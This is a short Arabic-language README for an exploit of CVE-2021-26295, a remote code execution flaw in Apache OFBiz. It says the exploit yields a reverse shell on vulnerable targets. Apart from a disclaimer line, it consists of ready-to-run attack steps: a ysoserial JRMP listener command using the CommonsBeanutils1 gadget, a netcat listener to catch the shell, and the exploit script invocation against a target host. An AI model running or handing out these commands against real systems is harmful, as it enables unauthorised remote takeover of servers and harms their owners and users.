
استغلال لـ CVE-2021-26295 (Apache OFBiz RCE) باستخدام مستمع ysoserial JRMP لتنفيذ الأوامر والحصول على قشرة عكسية على الأهداف الضعيفة.
يمكن لـ CVE-2021-26295 EXP الحصول على شل عكسي بنجاح
هذه المقالة والأدوات مخصصة للمشاركة التقنية فقط، ويُحظر استخدامها لأغراض غير قانونية. وإلا، يتحمل المستخدم المسؤولية الكاملة عن أي عواقب.
RMI على المنفذ 9999 على VPSjava -cp ysoserial.jar ysoserial.exploit.JRMPListener 9999 CommonsBeanutils1 '[الأمر المراد تنفيذه]'
nc على المنفذ 64444 على VPSnc -lvp 64444
python3 cve-2021-26295_exp.py <target> <vps_ip> <vps_port>

